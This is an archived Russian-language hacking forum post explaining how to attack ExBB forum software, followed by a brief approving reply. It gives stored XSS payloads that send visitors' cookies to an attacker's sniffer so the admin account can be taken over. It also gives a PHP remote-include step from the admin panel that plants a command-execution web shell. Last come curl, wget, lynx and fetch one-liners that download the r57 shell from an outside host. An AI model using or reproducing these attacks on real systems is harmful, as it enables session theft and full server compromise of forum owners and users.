PDA

Просмотр полной версии : Exbb Анализ уязвимостей


N0n$e№Z
05.01.2007, 01:31
И так в этой статье я расскажу как использовать уязвимости в форумах ExBB

XSS:

[+email]'style='display:none;background:url(javascript:doc ument.images[2].src="http://Ваш сниффер?"+document.cookie)[/email]
[+url="]"style='background:url(javascript:document. images[0].src="http://Ваш сниффер?"+document.cookie)'[/url]

Перед использованием удалить из строчек +

Это XSS уязвимости с помощью которых вы добудите Cookie,а уже с их помощью сможете узнать пароль админа!
Далее при заходе на страницу с этим постом вам на сниффер будут отправлены Cookie того или иного пользователя!Среди них может быть и админ!
Способ применения: Данные "Коды" нужно вставить в тело сообщения(Поста)! Для проверки их работоспособности можно нажать "Предварительный просмотр"!

Exploit's :

http://www.milw0rm.com/exploits/1713
http://www.milw0rm.com/exploits/1686

PHP-инклюдинг - (Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.)

Для того чтобы воспользоваться данной уязвимостью надо иметь доступ в Админ центр!

Зашли мы в админку:
1.Выбираем из столбца меню "Конфигурация".
2.Находим строчку URL вашей конференции
3.Там будет что-то вроде http://site/exbb/
4.Добавим в конец строчки '.@include('http://site/hackexbb.txt').'
5.Все
Объясню...
'.@include('http://здесь сайт на котором лежит файл >>>>hackexbb.txt').'

hackexbb.txt (Должен иметь содержимое со скриптом)

<?
$fp=fopen("im/avatars/personal/shell.php", "w");
fputs($fp,"<?
system(\$_GET['c']);
?>");
fclose($fp);
?>

Этот скрипт зальет в директорию im/avatars/personal/ простенькие шелл (shell.php) с помощью которого мы загрузим полноценный шелл!

Далее...

Все это примет вид - http://site/exbb/im/avatars/personal/shell.php

Чтобы воспользоваться коммандами делаем так в конец shell.php добавляем ?c=команда Т.Е. http://site/exbb/im/avatars/personal/shell.php?c=ls

Теперь о командах:
ls - просмотр файлов в данной директоии
pwd - просмотр пути до шелла.
uname - a - Имя ОС

Для заливки файлом используем команды:

curl --output im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

wget -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

get http://vrms.narod.ru/r57shell.php > /r57shell.php

links -source "http://vrms.narod.ru/r57shell.php" > im/avatars/personal/r57shell.php

lynx -source http://vrms.narod.ru/r57shell.php > im/avatars/personal/r57shell.php

fetch -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

И дальше r57 поможет вам во всем!!

Удачи!Данная статья не является пособием по взлому)))

n0ne
05.01.2007, 09:10
Статья неплохая по моему, вот только имхо надо перенести в статьи, а не уязвимости))